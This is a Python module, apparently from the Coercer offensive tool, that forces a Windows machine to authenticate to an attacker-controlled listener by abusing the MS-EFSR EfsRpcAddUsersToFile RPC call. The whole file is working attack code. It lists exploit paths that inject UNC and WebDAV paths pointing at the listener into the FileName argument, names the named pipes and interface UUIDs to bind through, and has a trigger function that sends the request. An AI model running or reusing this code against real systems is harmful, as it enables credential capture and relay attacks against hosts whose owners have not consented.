coercer.methods.MS_EFSR.EfsRpcAddUsersToFile

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcAddUsersToFile.py
  4# Author             : XiaoliChan
  5# Date created       : 18 Mar 2023
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
class EFS_HASH_BLOB(NDRSTRUCT):
    """
    NDR layout used for the MS-EFSR EFS_HASH_BLOB (certificate hash blob).

    Only FileName of the call below is set by trigger(); this struct is
    never filled in and goes out with whatever impacket emits for an unset
    NDRSTRUCT.

    NOTE(review): the field names look swapped relative to the spec, where
    the DWORD is the byte count (cbData) and the byte pointer is the data
    (bData) — verify against MS-EFSR. Renaming would not change the wire
    layout, only the keys a caller would use to set the fields, so it is
    left as is.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )
 18
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """
    NDR layout used for the MS-EFSR ENCRYPTION_CERTIFICATE_HASH structure.

    Never populated by this module (see trigger()); present so that the
    request structure can be built.

    NOTE(review): the spec declares the SID and hash members as pointers
    (RPC_SID*, EFS_HASH_BLOB*) rather than embedded structs — verify the
    encoding against MS-EFSR before relying on this struct for anything
    other than the coercion call.
    """
    structure = (
        ('Lenght', DWORD),   # sic: typo for "Length"; key kept since callers set fields by name
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )  
 26
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    """
    NDR layout used for the MS-EFSR ENCRYPTION_CERTIFICATE_LIST argument.

    Never populated by this module (see trigger()).

    NOTE(review): in the spec Users is a size_is(nUsers) array of pointers,
    not a single embedded ENCRYPTION_CERTIFICATE_HASH as encoded here — the
    coercion only needs FileName to be parsed by the server, so this has
    not mattered in practice, but verify before reusing the struct.
    """
    structure = (
        ('nUsers', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )
 32
class _EfsRpcAddUsersToFile(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcAddUsersToFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    FileName is the coercion vector: the UNC path written here is what the
    target's EFS service tries to reach. EncryptionCertificates is never set
    by trigger() and is sent with impacket's defaults for the struct.

    NOTE(review): the spec declares EncryptionCertificates as a pointer
    (ENCRYPTION_CERTIFICATE_LIST*) whereas it is embedded flat here — kept
    as is because this is the encoding the tool ships with; verify against
    MS-EFSR if the call ever needs a real certificate list.
    """
    opnum = 9
    structure = (
        ('FileName', WSTR),   # Type: wchar_t * — caller must include the trailing NUL
        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
    )
 42
class _EfsRpcAddUsersToFileResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcAddUsersToFile() (opnum 9) in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    Empty on purpose: trigger() discards the response, so only the fact
    that the call returned (or faulted) matters here.
    """
    structure = ()
 48
 49
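class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcAddUsersToFile (opnum 9) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/afd56d24-3732-4477-b5cf-44cc33848d85)

    The FileName argument is attacker-controlled (see ``vulnerable_arguments``)
    and is rendered from one of ``exploit_paths``. Pointing it at a UNC path on
    the listener makes the target's EFS service reach out and authenticate.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Every path carries an explicit NUL: the WSTR field does not append the
    # wchar_t terminator itself. The ``http`` entry uses ``/`` after the host
    # token, the shape usually routed through the WebClient/WebDAV redirector
    # — TODO(review): confirm against the framework's template expansion.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Transports and interface bindings the framework may try. The two UUIDs
    # are presumably the two MS-EFSR interfaces (efsrpc and the lsarpc-hosted
    # one) — verify against the spec's transport section; the latter is listed
    # through several named pipes.
    # The key is spelled "ncan_np" (sic): it is the key the framework looks up,
    # so it must not be renamed here in isolation.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # "vulnerable_arguments" names the request field the path is injected into.
    function = {
        "name": "EfsRpcAddUsersToFile",
        "opnum": 9,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcAddUsersToFile request carrying ``self.path`` as FileName.

        Args:
            dcerpc_session: bound DCERPC session obtained from ``connect()``;
                ``None`` is reported on stdout and nothing is sent.
            target: unused here; part of the common method interface.

        Returns:
            ``""`` when the request was sent and answered without an exception,
            the caught exception object otherwise, or ``None`` when no session
            was given. These three outcomes are what the framework distinguishes
            and are preserved as is.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcAddUsersToFile()
            request['FileName'] = self.path
            # The response is discarded: the coercion happens on the target
            # while it resolves FileName, regardless of what the call returns.
            # The broad except is deliberate — a DCERPC fault or transport
            # error is handed back to the caller rather than raised, since the
            # target may already have connected to the listener by then.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            return err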